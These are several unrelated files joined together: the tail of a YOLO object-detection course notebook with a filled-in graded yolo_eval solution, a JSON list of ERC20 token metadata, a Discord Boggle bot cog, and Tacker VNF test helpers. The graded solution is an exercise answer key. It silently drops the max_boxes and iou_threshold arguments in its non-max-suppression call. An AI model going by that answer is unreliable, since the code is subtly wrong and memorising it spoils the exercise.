print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
# GRADED FUNCTION: yolo_eval
def yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):
"""
Converts the output of YOLO encoding (a lot of boxes) to your predicted boxes along with their scores, box coordinates and classes.
Arguments:
yolo_outputs -- output of the encoding model (for image_shape of (608, 608, 3)), contains 4 tensors:
box_confidence: tensor of shape (None, 19, 19, 5, 1)
box_xy: tensor of shape (None, 19, 19, 5, 2)
box_wh: tensor of shape (None, 19, 19, 5, 2)
box_class_probs: tensor of shape (None, 19, 19, 5, 80)
image_shape -- tensor of shape (2,) containing the input shape, in this notebook we use (608., 608.) (has to be float32 dtype)
max_boxes -- integer, maximum number of predicted boxes you'd like
score_threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (None, ), predicted score for each box
boxes -- tensor of shape (None, 4), predicted box coordinates
classes -- tensor of shape (None,), predicted class for each box
"""
### START CODE HERE ###
# Retrieve outputs of the YOLO model (≈1 line)
box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs
# Convert boxes to be ready for filtering functions
boxes = yolo_boxes_to_corners(box_xy, box_wh)
# Use one of the functions you've implemented to perform Score-filtering with a threshold of score_threshold (≈1 line)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=score_threshold)
# Scale boxes back to original image shape.
boxes = scale_boxes(boxes, image_shape)
# Use one of the functions you've implemented to perform Non-max suppression with a threshold of iou_threshold (≈1 line)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)
### END CODE HERE ###
return scores, boxes, classes
# In[25]:
with tf.Session() as test_b:
yolo_outputs = (tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed | |
"youtube": ""
}
},
"XGG": {
"symbol": "XGG",
"address": "0xf6b6AA0Ef0f5Edc2C1c5d925477F97eAF66303e7",
"decimals": 8,
"name": "Going Gems",
"ens_address": "",
"website": "https://www.going-gems.com",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://www.going-gems.com/#blog",
"chat": "",
"facebook": "https://web.facebook.com/Going-Gems-307192689810299/",
"forum": "",
"github": "https://github.com/GoingGems",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "https://goinggemsholding.slack.com",
"telegram": "https://t.me/GoingGemsChannel",
"twitter": "https://twitter.com/GoingGems",
"youtube": ""
}
},
"CPT": {
"symbol": "CPT",
"name": "Contents Protocol Token",
"type": "ERC20",
"address": "0x9B62513c8a27290CF6A7A9e29386e600245EA819",
"ens_address": "",
"decimals": 18,
"website": "https://contentsprotocol.io",
"logo": {
"src": "https://contentsprotocol.io/icon_128x128.png",
"width": "128",
"height": "128",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/@contents_prtcl",
"chat": "",
"facebook": "https://www.facebook.com/ContentsProtocol",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/company/contents-protocol",
"reddit": "",
"slack": "",
"telegram": "https://t.me/contents_protocol_en",
"twitter": "https://twitter.com/contents_prtcl",
"youtube": "https://www.youtube.com/channel/UCiRtJ81_UV-n3dghkF5fsmA"
}
},
"CMT": {
"symbol": "CMT",
"address": "0xf85fEea2FdD81d51177F6b8F35F0e6734Ce45F5F",
"decimals": 18,
"name": "<NAME>",
"ens_address": "",
"website": "https://cm.5miles.com",
"logo": {
"src": "http://res.5milesapp.com/image/upload/v1512116368/ico/cmt28.png",
"width": 28,
"height": 28,
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "http://www.cybermiles.io",
"chat": "",
"facebook": "https://www.facebook.com/cybermiles",
"forum": "",
"github": "https://github.com/CyberMiles",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/user/CyberMiles",
"slack": "https://slack.5miles.com",
"telegram": "https://t.me/cybermilestoken",
"twitter": "https://twitter.com/cybermiles",
"youtube": ""
}
},
"EPX": {
"symbol": "EPX",
"address": "0x35BAA72038F127f9f8C8f9B491049f64f377914d",
"decimals": 4,
"name": "ethPoker.io EPX",
"ens_address": "",
"website": "https://ethPoker.io",
"logo": {
"src": "https://ethpoker.io/wp-content/uploads/2018/03/smallBlueIcon.png",
"width": "51",
"height": "50",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": "https://ethPoker.io"
},
"social": {
"blog": "https://ethpoker.io/",
"chat": "",
"facebook": "",
"forum": "",
"github": "https://github.com/EthPokerIO/ethpokerIO",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/in/ethpoker/",
"reddit": "",
"slack": "",
"telegram": "https://t.me/EthPokerIOpresale",
"twitter": "https://twitter.com/ethpoker",
"youtube": ""
}
},
"SPF": {
"symbol": "SPF",
"address": "0x85089389C14Bd9c77FC2b8F0c3d1dC3363Bf06Ef",
"decimals": 18,
"name": "Sportify",
"ens_address": "",
"website": "https://sportyfi.io",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/sportyfi_io",
"youtube": ""
}
},
"sUSD": {
"symbol": "sUSD",
"name": "USD Synth (sUSD)",
"type": "ERC20",
"address": "0x57Ab1E02fEE23774580C119740129eAC7081e9D3",
"ens_address": "",
"decimals": 18,
"website": "https://www.synthetix.io",
"logo": {
"src": "https://www.synthetix.io/img/sUSD_blue_sml.png",
"width": "32",
"height": "32",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://blog.havven.io",
"chat": "https://discordapp.com/invite/AEdUHzt",
"facebook": "",
"forum": "",
"github": "https://github.com/havven/",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/company/synthetix/",
"reddit": "https://www.reddit.com/r/synthetix_io/",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/synthetix_io",
"youtube": ""
}
},
"SGR": {
"symbol": "SGR",
"name": "Sugar Exchange",
"type": "ERC20",
"address": "0xCB5A05beF3257613E984C17DbcF039952B6d883F",
"ens_address": "",
"decimals": 8,
"website": "http://sugarexchange.io",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/Sugar_Exchange",
"youtube": ""
}
},
"SPN": {
"symbol": "SPN",
"address": "0x20F7A3DdF244dc9299975b4Da1C39F8D5D75f05A",
"decimals": 6,
"name": "Sapien",
"ens_address": "",
"website": "https://www.sapien.network/",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "https://t.me/SapienNetwork",
"twitter": "",
"youtube": ""
}
},
"MESH": {
"symbol": "MESH",
"address": "0x01F2AcF2914860331C1Cb1a9AcecDa7475e06Af8",
"decimals": 18,
"name": "Meshbox",
"ens_address": "",
"website": "https://meshbox.network",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "https://www.facebook.com/MeshBoxFoundation/",
"forum": "",
"github": "https://github.com/MeshBox",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/company/meshbox/",
"reddit": "",
"slack": "",
"telegram": "t.me/MeshBoxEN",
"twitter": "https://twitter.com/Mesh_Box",
"youtube": "https://www.youtube.com/channel/UCQHwUo9rRidByL9vMlv0vSQ"
}
},
"NOX": {
"symbol": "NOX",
"address": "0xeC46f8207D766012454c408De210BCBc2243E71c",
"decimals": 18,
"name": "Nitro",
"ens_address": "",
"website": "https://nitro.live",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/@NitroToken",
"chat": "",
"facebook": "https://www.facebook.com/NitroToken",
"forum": "https://bitcointalk.org/index.php?topic=2254986.0",
"github": "https://github.com/nitrotoken/nitro-crowdsale",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/nitrotoken",
"slack": "",
"telegram": "https://t.me/NitroToken_NOX",
"twitter": "https://twitter.com/nitrotoken",
"youtube": ""
}
},
"PRO": {
"symbol": "PRO",
"address": "0x226bb599a12C826476e3A771454697EA52E9E220",
"decimals": 8,
"name": "Propy",
"ens_address": "",
"website": "https://propy.com",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/@propy",
"chat": "",
"facebook": "https://www.facebook.com/propyinc",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/company/propy-inc-",
"reddit": "",
"slack": "https://propy.slack.com",
"telegram": "https://t.me/propy",
"twitter": "https://twitter.com/propyinc",
"youtube": ""
}
},
"HBZ": {
"symbol": "HBZ",
"name": "HBZ coin",
"type": "ERC20",
"address": "0xE34e1944E776f39B9252790a0527eBDa647aE668",
"ens_address": "",
"decimals": 18,
"website": "https://www.hbzcoin.com/#",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "https://medium.com/@HBZCoinOfficial",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/HelbizOfficial",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/HbZcoin",
"youtube": ""
}
},
"DIVX": {
"symbol": "DIVX",
"address": "0x13f11C9905A08ca76e3e853bE63D4f0944326C72",
"decimals": 18,
"name": "DIVX",
"ens_address": "",
"website": "https://www.diviproject.org",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "",
"chat": "https://discord.gg/KQdVYsF",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/DiviProject",
"slack": "",
"telegram": "https://t.me/joinchat/EAdiTQ3yZk_GkqU0IdG-Gg",
"twitter": "",
"youtube": ""
}
},
"CAT (BitClave)": {
"symbol": "CAT (BitClave)",
"address": "0x1234567461d3f8Db7496581774Bd869C83D51c93",
"decimals": 18,
"name": "BitClave",
"ens_address": "",
"website": "https://www.bitclave.com",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://weibo.com/bitclave",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "https://slack.bitclave.com",
"telegram": "",
"twitter": "https://twitter.com/bitclave",
"youtube": ""
}
},
"EDO": {
"symbol": "EDO",
"address": "0xCeD4E93198734dDaFf8492d525Bd258D49eb388E",
"decimals": 18,
"name": "Eidoo",
"ens_address": "",
"website": "https://eidoo.io",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/eidoo",
"chat": "",
"facebook": "https://www.facebook.com/eidoocrypto",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "https://t.me/joinchat/AAAAAERSsZk99wFzx2v_Kw",
"twitter": "https://twitter.com/eidoo_io",
"youtube": ""
}
},
"A18": {
"symbol": "A18",
"name": "Apollo18",
"type": "ERC20",
"address": "0xBa7DCBa2Ade319Bc772DB4df75A76BA00dFb31b0",
"ens_address": "",
"decimals": 0,
"website": "https://apollo18.co.in",
"logo": {
"src": "https://apollo18.co.in/wp-content/uploads/2018/08/a18-28x28.png",
"width": "28",
"height": "28",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/@apollo18",
"chat": "",
"facebook": "https://facebook.apollo18.co.in",
"forum": "",
"github": "https://github.com/apollo18crypto",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "https://telegram.apollo18.co.in",
"twitter": "https://twitter.apollo18.co.in",
"youtube": "http://youtube.apollo18.co.in"
}
},
"ONL": {
"symbol": "ONL",
"name": "On.Live",
"type": "ERC20",
"address": "0x6863bE0e7CF7ce860A574760e9020D519a8bDC47",
"ens_address": "",
"decimals": 18,
"website": "https://on.live",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/onlivetv",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/on_live",
"youtube": ""
}
},
"NTK": {
"symbol": "NTK",
"name": "Neurotoken",
"type": "ERC20",
"address": "0x69BEaB403438253f13b6e92Db91F7FB849258263",
"ens_address": "",
"decimals": 18,
"website": "https://neuromation.io",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/Neuromation",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/neuromation_io",
"youtube": ""
}
},
"KNC": {
"symbol": "KNC",
"address": "0xdd974D5C2e2928deA5F71b9825b8b646686BD200",
"decimals": 18,
"name": "<NAME>",
"ens_address": "",
"website": "https://kyber.network",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "https://github.com/KyberNetwork",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "https://kybernetwork.slack.com",
"telegram": "",
"twitter": "https://twitter.com/KyberNetwork",
"youtube": ""
}
},
"DRT": {
"symbol": "DRT",
"name": "DomRaider",
"type": "ERC20",
"address": "0x9AF4f26941677C706cfEcf6D3379FF01bB85D5Ab",
"ens_address": "",
"decimals": 8,
"website": "https://token.domraider.com",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/DomRaider",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/domraider",
"youtube": ""
}
},
"DST": {
"symbol": "DST",
"name": "Dimensions Strike Token",
"type": "ERC20",
| |
<reponame>Daggy1234/BotBot
from __future__ import annotations
import asyncio
import random
from functools import wraps
from string import ascii_uppercase
from collections import defaultdict
from collections.abc import Iterable
from typing import NamedTuple, Optional
import discord
from discord.ext import commands, menus
from ditto import BotBase, Context
from ditto.types import User
from ditto.utils.strings import ordinal
SMALL = 3
ORIGINAL = 4
BIG = 5
SUPER_BIG = 6
# Diagram Emoji
AN_EMOJI = "<:_:808942978658861116>"
ER_EMOJI = "<:_:808944481382563870>"
HE_EMOJI = "<:_:808944480525746176>"
IN_EMOJI = "<:_:808942977464270849>"
QU_EMOJI = "<:_:806844322346565662>"
TH_EMOJI = "<:_:808944481264730112>"
REGIONAL_INDICATOR_EMOJI = (
"\N{REGIONAL INDICATOR SYMBOL LETTER A}",
"\N{REGIONAL INDICATOR SYMBOL LETTER B}",
"\N{REGIONAL INDICATOR SYMBOL LETTER C}",
"\N{REGIONAL INDICATOR SYMBOL LETTER D}",
"\N{REGIONAL INDICATOR SYMBOL LETTER E}",
"\N{REGIONAL INDICATOR SYMBOL LETTER F}",
"\N{REGIONAL INDICATOR SYMBOL LETTER G}",
"\N{REGIONAL INDICATOR SYMBOL LETTER H}",
"\N{REGIONAL INDICATOR SYMBOL LETTER I}",
"\N{REGIONAL INDICATOR SYMBOL LETTER J}",
"\N{REGIONAL INDICATOR SYMBOL LETTER K}",
"\N{REGIONAL INDICATOR SYMBOL LETTER L}",
"\N{REGIONAL INDICATOR SYMBOL LETTER M}",
"\N{REGIONAL INDICATOR SYMBOL LETTER N}",
"\N{REGIONAL INDICATOR SYMBOL LETTER O}",
"\N{REGIONAL INDICATOR SYMBOL LETTER P}",
"\N{REGIONAL INDICATOR SYMBOL LETTER Q}",
"\N{REGIONAL INDICATOR SYMBOL LETTER R}",
"\N{REGIONAL INDICATOR SYMBOL LETTER S}",
"\N{REGIONAL INDICATOR SYMBOL LETTER T}",
"\N{REGIONAL INDICATOR SYMBOL LETTER U}",
"\N{REGIONAL INDICATOR SYMBOL LETTER V}",
"\N{REGIONAL INDICATOR SYMBOL LETTER W}",
"\N{REGIONAL INDICATOR SYMBOL LETTER X}",
"\N{REGIONAL INDICATOR SYMBOL LETTER Y}",
"\N{REGIONAL INDICATOR SYMBOL LETTER Z}",
)
DIAGRAPHS = {"1": "AN", "2": "ER", "3": "HE", "4": "IN", "5": "QU", "6": "TH"}
LETTERS_EMOJI = {
"#": "\N{BLACK SQUARE FOR STOP}\ufe0f",
"1": AN_EMOJI,
"2": ER_EMOJI,
"3": HE_EMOJI,
"4": IN_EMOJI,
"5": QU_EMOJI,
"6": TH_EMOJI,
} | {letter: emoji for letter, emoji in zip(ascii_uppercase, REGIONAL_INDICATOR_EMOJI)}
# fmt: off
DIE = {
SMALL: [
"ATSWKA", "ZHIWIR", "WYASAY",
"NELTDL", "UJNIIQ", "ORQPII",
"PCOAUB", "TKRTAU", "ZAQLPG",
],
ORIGINAL: [
"RIFOBX", "IFEHEY", "DENOWS", "UTOKND",
"HMSRAO", "LUPETS", "ACITOA", "YLGKUE",
"5BMJOA", "EHISPN", "VETIGN", "BALIYT",
"EZAVND", "RALESC", "UWILRG", "PACEMD",
],
BIG: [
"5BZJXK", "TOUOTO", "OVWGR", "AAAFSR", "AUMEEG",
"HHLRDO", "MJDTHO", "LHNROD", "AFAISR", "YIFASR",
"TELPCI", "SSNSEU", "RIYPRH", "DORDLN", "CCWNST",
"TTOTEM", "SCTIEP", "EANDNN", "MNNEAG", "UOTOWN",
"AEAEEE", "YIFPSR", "EEEEMA", "ITITIE", "ETILIC",
],
SUPER_BIG: [
"AAAFRS", "AAEEEE", "AAEEOO", "AAFIRS", "ABDEIO", "ADENNN",
"AEEEEM", "AEEGMU", "AEGMNN", "AEILMN", "AEINOU", "AFIRSY",
"123456", "BBJKXZ", "CCENST", "CDDLNN", "CEIITT", "CEIPST",
"CFGNUY", "DDHNOT", "DHHLOR", "DHHNOW", "DHLNOR", "EHILRS",
"EIILST", "EILPST", "EIO###", "EMTTTO", "ENSSSU", "GORRVW",
"HIRSTV", "HOPRST", "IPRSYY", "JK5WXZ", "NOOTUW", "OOOTTU",
],
}
# fmt: on
with open("res/boggle.txt") as f:
DICTIONARY = set(f.read().splitlines())
POINTS = {
3: 1,
4: 1,
5: 2,
6: 3,
7: 5,
} | {x: 11 for x in range(8, SUPER_BIG ** 2)}
class Position(NamedTuple):
col: int
row: int
class Board:
def __init__(self, *, size=ORIGINAL, board=None):
self.size = size
if board is None:
board = DIE[self.size].copy()
random.shuffle(board)
board = [
[random.choice(board[row * self.size + column]) for column in range(self.size)]
for row in range(self.size)
]
self.columns = board
def board_contains(self, word: str, pos: Position = None, passed: list[Position] = []) -> bool:
# Empty words
if len(word) == 0:
return True
# When starting out
if pos is None:
# Check all positions
for col in range(self.size):
for row in range(self.size):
if self.board_contains(word, Position(col, row)):
return True
# Checking new squares
elif pos not in passed:
# Check if letter matches current start of word
letter = self.columns[pos.col][pos.row]
if letter.isdigit():
letter = DIAGRAPHS[letter]
if word[: len(letter)] == letter:
# Check adjacent for next letter
for x in range(-1, 2):
for y in range(-1, 2):
# don't check yourself
if x == 0 and y == 0:
continue
new_pos = Position(pos.col + x, pos.row + y)
# don't check out of bounds
if new_pos.col < 0 or new_pos.col >= self.size or new_pos.row < 0 or new_pos.row >= self.size:
continue
if self.board_contains(word[len(letter) :], new_pos, [*passed, pos]):
return True
# Otherwise cannot find word
return False
# @cached_property
# def legal_words(self) -> set[str]:
# return {word for word in DICTIONARY if self.is_legal(word)}
def is_legal(self, word: str) -> bool:
if len(word) < 3:
return False
word = word.upper()
if word not in DICTIONARY:
return False
return self.board_contains(word)
def points(self, word: str) -> int:
return POINTS[len(word)] if self.is_legal(word) else 0
def total_points(self, words: Iterable[str]) -> int:
return sum(self.points(word) for word in words)
class Game(menus.Menu):
name: Optional[str] = "Boggle"
footer: Optional[str] = None
def __init__(self, *, size=ORIGINAL, **kwargs):
self.board = Board(size=size)
self.setup()
super().__init__(**kwargs)
@property
def state(self):
state = ""
for row in range(self.board.size):
emoji = []
for column in range(self.board.size):
emoji.append(LETTERS_EMOJI[self.board.columns[column][row]])
state = " ".join(emoji) + "\n" + state
return discord.Embed(title=self.name, description=state).set_footer(text=self.footer)
def setup(self):
raise NotImplementedError
async def send_initial_message(self, ctx, channel):
return await channel.send(content="Boggle game started, you have 3 minutes!", embed=self.state)
async def start(self, *args, **kwargs):
await super().start(*args, **kwargs)
# await self.bot.loop.run_in_executor(None, lambda: self.board.legal_words)
async def finalize(self, timed_out):
self.bot.dispatch("boggle_game_complete", self.message.channel)
def get_points(self, words: Iterable[str]) -> int:
return self.board.total_points(words)
def check_word(self, word: str) -> bool:
return self.board.is_legal(word)
async def check_message(self, message: discord.Message):
raise NotImplementedError
@menus.button("\N{BLACK SQUARE FOR STOP}\ufe0f", position=menus.Last(0))
async def cancel(self, payload):
await self.message.edit(content="Game Cancelled.")
self.stop()
class ShuffflingGame(Game):
def __init__(self, *, size=ORIGINAL, **kwargs):
super().__init__(size=size, **kwargs)
self.boards = [self.board]
def shuffle(self):
raise NotImplementedError
async def shuffle_task(self):
for i in range(5):
await asyncio.sleep(30)
if not self._running:
return
# Shuffle board
self.shuffle()
self.boards.append(self.board)
# Note Board Updated
await self.message.channel.send("Board Updated!")
# Update Board Message
time = [
"2 minutes, 30 seconds",
"2 minutes",
"1 minute, 30 seconds",
"1 minute",
"30 seconds",
][i]
await self.message.edit(content=f"Board Updated! You have {time} left!", embed=self.state)
async def start(self, *args, **kwargs):
await super().start(*args, **kwargs)
self.bot.loop.create_task(self.shuffle_task())
def get_points(self, words: Iterable[str]) -> int:
points = 0
for word in words:
for board in self.boards:
pts = board.points(word)
if pts:
points += pts
break
return points
class DiscordGame(Game):
name = "Discord Boggle"
footer = "First to find a word wins points!"
@property
def scores(self):
embed = discord.Embed()
i = 0
old = None
for user, words in sorted(self.words.items(), key=lambda v: self.get_points(v[1]), reverse=True):
points = self.get_points(words)
if points != old:
old = points
i += 1
embed.add_field(
name=f"{ordinal(i)}: {user}",
value=f"**{len(words)}** words, **{points}** points.",
inline=False,
)
return embed
def setup(self):
self.all_words: set[str] = set()
self.words: dict[User, set[str]] = defaultdict(set)
async def check_message(self, message: discord.Message):
word = message.content
if word is None:
return
if not word.isalpha():
return
word = word.upper()
if not self.check_word(word):
return
if word in self.all_words:
return
# Add to user words
self.all_words.add(word)
self.words[message.author].add(word)
await message.add_reaction("\N{WHITE HEAVY CHECK MARK}")
async def finalize(self, timed_out: bool):
await super().finalize(timed_out)
if timed_out:
await self.message.edit(content="Game Over!")
await self.message.reply(embed=self.scores)
class ClassicGame(Game):
name = "Classic Boggle"
footer = "Keep a list of words til the end!"
@property
def scores(self):
embed = discord.Embed()
i = 0
old = None
for user, unique in sorted(
self.unique_words.items(),
key=lambda v: self.board.total_points(v[1]),
reverse=True,
):
words = self.words[user]
points = self.board.total_points(unique)
if points != old:
old = points
i += 1
embed.add_field(
name=f"{ordinal(i)}: {user}",
value=f"**{len(words)}** words, **{len(unique)}** unique, **{points}** points.",
inline=False,
)
return embed
def filter_lists(self):
for user, word_list in self.word_lists.items():
for word in word_list.split():
word = word.strip().upper()
if not word.isalpha():
continue
if not self.check_word(word):
continue
self.words[user].add(word)
# Remove from all sets if not unique
if word in self.used_words:
for list in self.unique_words.values():
if word in list:
list.remove(word)
continue
self.used_words.add(word)
self.unique_words[user].add(word)
async def check_message(self, message: discord.Message):
if message.author == self.bot.user:
return
if not self.over:
return
if message.content is None:
return
if message.author in self.word_lists:
return
self.word_lists[message.author] = message.content
await message.add_reaction("\N{WHITE HEAVY CHECK MARK}")
def setup(self):
self.over = False
self.used_words: set[str] = set()
self.word_lists: dict[User, str] = dict()
self.words: dict[User, set[str]] = defaultdict(set)
self.unique_words: dict[User, set[str]] = defaultdict(set)
async def finalize(self, timed_out: bool):
await super().finalize(timed_out)
if timed_out:
await self.message.edit(content="Game Over!")
await self.message.reply("Game Over! you have 10 seconds to send in your words.")
self.over = True
await asyncio.sleep(10)
self.filter_lists()
await self.message.reply(embed=self.scores)
class FlipGame(ShuffflingGame, DiscordGame):
name = "<NAME>"
footer = "Find words as fast as you can, rows will flip positions every 30 seconds."
def shuffle(self):
rows = [[self.board.columns[x][y] for x in range(self.board.size)] for y in range(self.board.size)]
random.shuffle(rows)
self.board = Board(
size=self.board.size,
board=[[rows[x][y] for x in range(self.board.size)] for y in range(self.board.size)],
)
class BoggleGame(ShuffflingGame, DiscordGame):
name = "<NAME>"
footer = "Find words as fast as you can, letters will shuffle positions every 30 seconds."
def shuffle(self):
letters = [self.board.columns[y][x] for x in range(self.board.size) for y in range(self.board.size)]
random.shuffle(letters)
self.board = Board(
size=self.board.size,
board=[
letters[x * self.board.size : x * self.board.size + self.board.size] for | |
# Copyright (C) 2020 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import random
import time
from oslo_serialization import jsonutils
from oslo_utils import uuidutils
from tacker.objects import fields
from tacker.tests.functional import base
from tacker.tests import utils
from tacker.vnfm.infra_drivers.openstack import constants as infra_cnst
VNF_PACKAGE_UPLOAD_TIMEOUT = 300
VNF_INSTANTIATE_TIMEOUT = 600
VNF_TERMINATE_TIMEOUT = 600
VNF_HEAL_TIMEOUT = 600
VNF_CHANGE_EXT_CONN_TIMEOUT = 600
RETRY_WAIT_TIME = 5
def get_ext_managed_virtual_link(id, vl_desc_id, resource_id):
return [{"id": id, "vnfVirtualLinkDescId": vl_desc_id,
"resourceId": resource_id}]
def generate_mac_address():
"""Generate an Ethernet MAC address."""
mac = [0xfa, 0x16, 0x3e,
random.randint(0x00, 0xff),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff)]
return ':'.join(map(lambda x: "%02x" % x, mac))
def generate_ip_addresses(
type_='IPV4',
fixed_addresses=None,
subnet_id=None):
if fixed_addresses:
ip_addr = {
'type': type_,
'fixedAddresses': fixed_addresses
}
if subnet_id:
ip_addr.update({'subnetId': subnet_id})
return [ip_addr]
def get_ext_cp_with_external_link_port(nw_resource_id, port_uuid):
ext_cp = {
"id": "external_network",
"resourceId": nw_resource_id,
"extCps": [{
"cpdId": "CP2",
"cpConfig": [{
"linkPortId": "413f4e46-21cf-41b1-be0f-de8d23f76cfe",
"cpProtocolData": [{
"layerProtocol": "IP_OVER_ETHERNET"
}]
}]
}],
"extLinkPorts": [{
"id": "413f4e46-21cf-41b1-be0f-de8d23f76cfe",
"resourceHandle": {
"resourceId": port_uuid,
"vimLevelResourceType": "LINKPORT"
}
}]
}
return ext_cp
def get_ext_cp_with_fixed_address(nw_resource_id, fixed_addresses, subnet_id):
ext_cp = {
"id": "external_network",
"resourceId": nw_resource_id,
"extCps": [{
"cpdId": "CP2",
"cpConfig": [{
"cpProtocolData": [{
"layerProtocol": "IP_OVER_ETHERNET",
"ipOverEthernet": {
"ipAddresses": generate_ip_addresses(
fixed_addresses=fixed_addresses,
subnet_id=subnet_id)
}
}]
}]
}]
}
return ext_cp
def get_external_virtual_links(net_0_resource_id, net_mgmt_resource_id,
port_uuid, fixed_addresses=None, subnet_id=None):
ext_vl = [
{
"id": "net0",
"resourceId": net_0_resource_id,
"extCps": [{
"cpdId": "CP1",
"cpConfig": [{
"cpProtocolData": [{
"layerProtocol": "IP_OVER_ETHERNET",
"ipOverEthernet": {
"macAddress": generate_mac_address()
}
}]
}]
}]
}
]
